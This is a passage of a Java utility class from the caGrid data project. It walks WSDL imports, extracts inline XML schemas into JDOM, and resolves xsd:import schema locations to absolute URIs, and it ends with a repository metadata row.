        LOG.debug("Looking for imports...");
        Map imports = mainDefinition.getImports();
        if (imports != null) {
            // imports map values are Lists of Import objects per namespace
            Iterator iter = imports.values().iterator();
            while (iter.hasNext()) {
                LOG.debug("Found imports...");
                List wsdlImports = (List) iter.next();
                for (int i = 0; i < wsdlImports.size(); i++) {
                    Import wsdlImport = (Import) wsdlImports.get(i);
                    Definition importDefinition = wsdlImport.getDefinition();
                    if (importDefinition != null) {
                        LOG.debug("Looking at imported WSDL at:" + importDefinition.getDocumentBaseURI());
                        walkWSDLFindingSchema(importDefinition, schemas);
                    }
                }
            }
        }
    }

    /**
     * Extracts the inline XML schema from a WSDL definition's types section,
     * converting it from DOM to JDOM.
     *
     * @return the schema element, or null if the definition has none
     */
    public static org.jdom.Element extractTypesSchema(Definition wsdlDefinition) {
        org.jdom.Element typesSchemaElm = null;
        if (wsdlDefinition != null) {
            Types types = wsdlDefinition.getTypes();
            if (types != null) {
                List extensibilityElements = types.getExtensibilityElements();
                for (int i = 0; i < extensibilityElements.size(); i++) {
                    ExtensibilityElement schemaExtElem = (ExtensibilityElement) extensibilityElements.get(i);
                    if (schemaExtElem != null) {
                        QName elementType = schemaExtElem.getElementType();
                        // only "schema" elements exposed as unknown extensions carry the XSD
                        if (elementType.getLocalPart().equals("schema")
                            && (schemaExtElem instanceof UnknownExtensibilityElement)) {
                            Element element = ((UnknownExtensibilityElement) schemaExtElem).getElement();
                            DOMBuilder domBuilder = new DOMBuilder();
                            typesSchemaElm = domBuilder.build(element);
                        }
                    }
                }
            }
        }
        return typesSchemaElm;
    }

    /**
     * Searches the collected schemas for an xsd:import of {@code namespace}
     * and resolves its schemaLocation against the owning document's URI.
     *
     * @param schemas map of document base URI to schema element (see
     *        {@link #walkWSDLFindingSchema})
     * @param namespace target namespace to locate
     * @return absolute URI of the imported schema, or null if not found
     */
    public static URI determineSchemaLocation(Map<String, org.jdom.Element> schemas, String namespace) {
        LOG.debug("Trying to find XSD location of namespace:" + namespace);
        if (schemas != null) {
            Iterator<String> iterator = schemas.keySet().iterator();
            while (iterator.hasNext()) {
                String mainURI = iterator.next();
                org.jdom.Element schema = schemas.get(mainURI);
                Iterator<?> childIter = schema.getChildren("import", schema.getNamespace()).iterator();
                while (childIter.hasNext()) {
                    org.jdom.Element importElm = (org.jdom.Element) childIter.next();
                    String ns = importElm.getAttributeValue("namespace");
                    if (ns.equals(namespace)) {
                        String location = importElm.getAttributeValue("schemaLocation");
                        LOG.debug("Found relative XSD location of namespace (" + namespace + ")=" + location);
                        // resolve the (possibly relative) location against the owning document
                        URI schemaURI = URI.create(Utils.encodeUrl(mainURI));
                        URI importURI = schemaURI.resolve(location);
                        LOG.debug("Converted complete location of namespace (" + namespace + ") to: "
                            + importURI.toString());
                        return importURI;
                    }
                }
            }
        }
        return null;
    }
}
| NCIP/cagrid-core | caGrid/projects/data/src/java/utilities/gov/nih/nci/cagrid/data/utilities/validation/WSDLUtils.java | Java | bsd-3-clause | 4,989 |